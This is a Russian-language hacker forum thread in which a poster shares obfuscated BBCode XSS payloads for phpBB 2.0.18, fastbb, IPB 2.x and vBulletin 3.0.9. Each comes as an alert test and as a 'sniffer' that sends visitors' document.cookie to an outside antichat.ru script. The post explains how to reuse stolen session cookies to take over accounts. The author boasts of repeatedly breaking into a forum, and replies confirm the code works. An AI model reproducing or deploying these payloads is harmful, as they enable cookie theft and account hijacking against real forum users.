Mayalsya Ya opyati ot bezdeliya, i dymaiu....poidy phpbb 2.0.18 vzlomaiu. Ny potratil nesoliko secund, koroche lovite kod alerta: HTML: [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]wj[/url][/url] Kod Sniffera: HTML: [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url] Yberite znaki "+" V SPEZIUALINIUH simvolah! http://webmastertools.narod.ru/OnlineTools/url_decode.html Dlya redaktorovaniya kyk von vam ssiulka. Lychsche vsego v Browsere Opera i ne zabydite, chto izmenyaete toliko phpbb2mysql_data a phpbb2mysql_sid mozhete ne menyati i ne trogati. Sniffak delaetsya ispolizyya ety ssiulky: http://www.h4cky0u.org/encrypt/index.php Ny i komy interesno, chitaite ety statiiu dlya profilaktiki http://forum.antichat.ru/thread10119.html Kak lomati fastbb po mnogochislennoiu prosibe posetiteleiu antichata. Alert. HTML: [font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]][/font] Sniffer: HTML: [font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie); ]][/font] Ne znaiu kak tam v fastbb rabotaet avtorizaziuya ne smotrel, no esli chto, to mozhno vsegda Adminy pomenyati paroli samomy, potomy chto paroli menyaetsya na noviu, bez starogo. Viuschla novaya versiya IPB 2.1.3 I lomaetsya eta versiya vot tak: (Ya proveril, i naschel chto etot ko rabotaet na VSEH 2.* i na vseh 1.* IPB. ) HTML: [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javaSCrip t:alert(/wj/))` Kyki voryem vot tak: HTML: [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` Ny i vBulletin 3.0.9 (Rabotaet do vBulletin 3.0.7) Hoti Ya yzhe ego v staroiui statie i viukladiuval, no ne vse kazhetsya ponyali osobenno novichki kak kod pravit chtobiu rabotal. Sniffer. HTML: [URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/url][/FONT][/URL] Kstati, eto yzhe k wapbbs. Viu svoiu forum posle moego tretiyago raza kak Ya vas vzlom opyati pochenili, a Ya OPYATI ego vzlomal. ) A kod ne viulozhy potomy chto diury zakroiite opyati i mne opyati pridetsya iskati tegi. Ne horoscho postypaiti Ya vas sorovno kogda hochy lomaiu!!!!! loooooooooool White Jordan.
слухай queen а тебе не кажеться, что воровать чужое добро плого, в частности заниматся плагиатом ЭТО ВСЕ коды Белого Джордана, если сам отказываешься в это поверить, то посмотри еще раз на эти коды и убедишься, у меня один в один такие же коды как у тебя, не могли мы с тобою одно и тоже подумать. Так что я думаю, ты сделаешь правильный вывод для себя, и удалишь свою тему.
ага мне тож писал он хотя в моем контакт листе не был... да и вообще надоело наверно быть всеобщим посмешищем=) да кстати эти баги фигня они не проходят=)
я бы не сказал конечно посмещищем, все таки он был знающим, как не крути но это так xss и СИ он знал отлично. а насчет его кодов, да, они работают тока надо немного их доработать, я проверял, все что он написал правда, и работает отлично, даже на ачате. но я думал, то раньше, что &+#58 это наоборот, чтоб не срабатывало кодируют так, а у него выходит что все нормально.
WJ Конечно молодец не чё не скажешь! Но все его XSS коды работают тока в IE. Но ведь есть FireFoX Opera/ Коды в студию =)
нет лол конечно можно сделать так, чтобы работало и в Опере и в Фаерфоксе, но просто как то саму разумеется выкладывается для Ие, а потом читатель дописывает код для той версии браузера, которая ему нужна. Ты вообще знаешь СКОЛЬКО в мире разных браузеров??? Не могу же Я дописывать для каждого браузера коды! Это просто дело времени да и не нужно. Есть много способов сделать чтобы коды работали в фаерфоксе кстати. Одна из них, эот использовать функцию onmouseover=alert(/wj/) ну и размер увеличить до такой велечены, чтобы хочешь не хочешь а хер....да много способов есть! Сам фаерфокс и опера, имеют меньше возможностей чем ИЕ это раз, так что Javascript без тегов и многое другое, не работает ни в фаерфоксе ни в опере. ИЕ это вообще самый лучшый браузер в мире, но он менее из-за этого защищён. Я та тут причём
Я себя никогда не прятал. Что значит Я выдал себя? Я сам не знаю почему не банят, и сам не знаю за что банят.
Ха как интересно, просто столько слухов шло, что коды в статье не работали, проверив, Я нашёл что они и действительно не работают. Хер знает почему, но видео которое Я снял, короче туда Я поместил уже рабочий код. Это видео будет ещё несколько дней там висеть потом оно само сотрётся. А вообще хорошо, что в статье код не работает даже когда плюсики убераешь.... ломать не будут.
мх, да нет, всё работает вродебы...+document.cookie не забудьте правильно написать и тогда всё работает.
Да. NeMiNeM, Показывает что всё работает. Если есть алёрт, будет всё остальное. И сниффер, и любой другой язык Javascript`а если сумеешь правильно всё написать.
Все прекрасно работает. Огромнейшее спасибо автору. Однако хотелось бы выяснить, есть ли подобные XSS для vb 3.5.x?
Ну у меня конечно есть. А в публику это Я выкладывать не хочу, так как это самый защищённый форум на сегодняшний день, (Я проверил) и хотелось бы на всякий пожарный, уметь его иметь. +) NeMiNeM, Сонный был, чуток не правильно сказал прочёл так сам засмеялся лол... Алёрт показывает что всё работает. Если есть алёрт, будет всё остальное, и сниффер, и любая другая функция Javascript`а если с умеешь правильно всё написать обойдя все фильтры. Вот так надо. +)
Что именно работает-то ? 2WJ Тебе конечно упорства не занимать, в плане поиска багов, но не мешало бы помнить, что все баги якобы тобой найденные, на самом деле были найдены античатом, и с применением технологий, описанных здесь же. Поменьше самовозвеличивания.
Ну не то, что все баги которые Я нахожу, уже нашёл античат....просто так скажу, 90% процентов, Я научился именно от тебя и zFailure`a. Больше всего от тебя. Это насчёт того, что с помощью тегов можно провести XSS атаку, засунув один тег в другой сам метод техники т.д. Вообще-то, если бы именно не ты, именно ты, то никто бы ничего не античате не знал так хорошо, как он знает, потому что ты был во многом первым и открыл море идей для других включая меня. Теперь, многие твои идеи Я уже улучшил и постоянно улучшаю. К примеру, уже спаренные теги, HTML: [COLOR=[IMG]http://www.wj.gif[/IMG]]wj[/COLOR] которые ты придумал или вложенные теги один в другой, HTML: [email][email protected][url]http://www.wj.com[/url][/email] которые ты тоже придумал, уже для нашего времени - старьё. ) Я теперь использую тройные, а часто четверные комбинации тегов. Вот это уже извини подвинься, придумал именно Я. =) Соглашаюсь, что до тебя всё, что почти все люди знали во всём мире, так это использовать одну из функций как увеличив буквы на всю страницу. Пришёл ты, и нашёл что в IE есть и существует третья, рабочая кавычка. Это всё работает только в браузере Микрасофта. (ИЕ) По всем доказательствам ты был первым, который это всё нашёл хотя не спорю, что это могли знать и другие люди, и ты мог быть не первым....ну во всяком случаи ты был первым, который вывел мир из тьмы незнания. ) Опять таки Я взял всю эту информацию и усовершенствовал её. Я теперь могу воровать куки во всех браузерах и делать это так, чтобы человек этого не заметил. Вот это тоже нашёл Я. Античат был базой и есть база, вот так скажу........античатовская школа, инфлуировала много-численное количество людей. Но никто не стоит на месте.
Джордан, а твой способ будет совершенно бесполезен если админ просто-напросто не поставит галочку "запомнить" при входе...На сниффер придут куки без хэша. Только сессия и id юзера.
